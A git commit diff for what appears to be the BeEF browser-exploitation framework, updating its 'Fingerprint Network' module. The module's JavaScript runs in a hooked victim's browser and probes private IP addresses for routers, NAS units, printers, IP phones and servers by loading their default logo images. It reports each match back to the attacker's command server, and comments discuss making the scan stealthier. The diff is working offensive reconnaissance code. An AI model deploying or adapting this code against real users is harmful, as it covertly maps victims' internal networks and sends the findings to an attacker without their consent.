Added more fingerprints to Fingerprint Network module

2012-01-08 15:47:15 +10:30
parent f54de7763e
commit fa3ba26e47
3 changed files with 31 additions and 27 deletions
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -31,28 +31,28 @@ beef.execute(function() {
        upperBound = ipBounds[1].split('.')[3];

        for(i=lowerBound;i<=upperBound;i++){
-            ipToTest = "http://"+ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+            ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
            ips.push(ipToTest);
        }
    }else{
        //use default IPs
        ips = [
-            'http://192.168.0.1',
-            'http://192.168.0.100',
-            'http://192.168.0.254',
-            'http://192.168.1.1',
-            'http://192.168.1.100',
-            'http://192.168.1.254',
-            'http://10.0.0.1',
-            'http://10.1.1.1',
-            'http://192.168.2.1',
-            'http://192.168.2.254',
-            'http://192.168.100.1',
-            'http://192.168.100.254',
-            'http://192.168.123.1',
-            'http://192.168.123.254',
-            'http://192.168.10.1',
-            'http://192.168.10.254'
+            '192.168.0.1',
+            '192.168.0.100',
+            '192.168.0.254',
+            '192.168.1.1',
+            '192.168.1.100',
+            '192.168.1.254',
+            '10.0.0.1',
+            '10.1.1.1',
+            '192.168.2.1',
+            '192.168.2.254',
+            '192.168.100.1',
+            '192.168.100.254',
+            '192.168.123.1',
+            '192.168.123.254',
+            '192.168.10.1',
+            '192.168.10.254'
        ];
    }

@@ -65,6 +65,8 @@ beef.execute(function() {
 	new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
 	new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
 	new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
+	new Array("Billion Router",":80",false,"/customized/logo.gif",318,69),
+	new Array("Billion Router",":80",false,"/customized/logo.gif",224,55),
 	new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
 	new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
 	new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
@@ -72,12 +74,15 @@ beef.execute(function() {
 	new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
 	new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
 	new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
+	new Array("Dell Laser Printer",":80",false,"/ews/images/delllogo.gif",100,100),
 	new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
-	new Array("HP LaserJet",":80",false,"/hp/device/images/logo.gif",42,27),
+	new Array("HP LaserJet Printer",":80",false,"/hp/device/images/logo.gif",42,27),
+	new Array("HP LaserJet Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
 	new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105),
 	new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
 	new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327),
 	new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26),
+	new Array("TwonkyMedia Server",":9000",false,"/images/TwonkyMediaServer_logo.jpg",150,82),
 	new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16)
 	);

@@ -89,16 +94,16 @@ beef.execute(function() {
                var img = new Image;
                //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
                img.id = u;
-                img.src = ips[i]+urls[u][1]+urls[u][3];
-                img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+                img.src = "http://"+ips[i]+urls[u][1]+urls[u][3];
+                img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
                dom.appendChild(img);
            }else{ // iterate to all the specified ports
                for(p=0;p<ports.length;p++){
                    var img = new Image;
                    //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
                    img.id = u;
-                    img.src = ips[i]+":"+ports[p]+urls[u][3];
-                    img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+                    img.src = "http://"+ips[i]+":"+ports[p]+urls[u][3];
+                    img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
                    dom.appendChild(img);
                }
            }
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -15,12 +15,12 @@
 #
 beef:
    module:
-        internal_network_fingerprinting:
+        fingerprint_network:
            enable: true
            category: "Network"
            name: "Fingerprint Network"
            description: "Discover devices and applications in the network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)."
            authors: ["bcoles@gmail.com", "wade", "antisnatchor"]
            target:
-                user_notify: ["FF", "IE"]
+                user_notify: ["FF", "IE", "C"]
                not_working: ["O"]
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -28,13 +28,12 @@
 # Improve stealth
 # -  Load images with CSS "background:" CSS to avoid http auth login popups
 # Improve speed
-# -  Make IP addresses a user-configurable option rather than a hard-coded list
 # -  Detect local ip range first - using browser history and/or with java
 #    - History theft via CSS history is patched in modern browsers.
 #    - Local IP theft with Java is slow and may fail


-class Internal_network_fingerprinting < BeEF::Core::Command
+class Fingerprint_network < BeEF::Core::Command
  
  def self.options
    return [
@@ -45,7 +44,7 @@ class Internal_network_fingerprinting < BeEF::Core::Command
  
  def post_execute
    content = {}
-    content['device'] =@datastore['device'] if not @datastore['device'].nil?
+    content['discovered'] = @datastore['discovered'] if not @datastore['discovered'].nil?
    content['url'] = @datastore['url'] if not @datastore['url'].nil?
    if content.empty?
      content['fail'] = 'No devices/applications have been discovered.'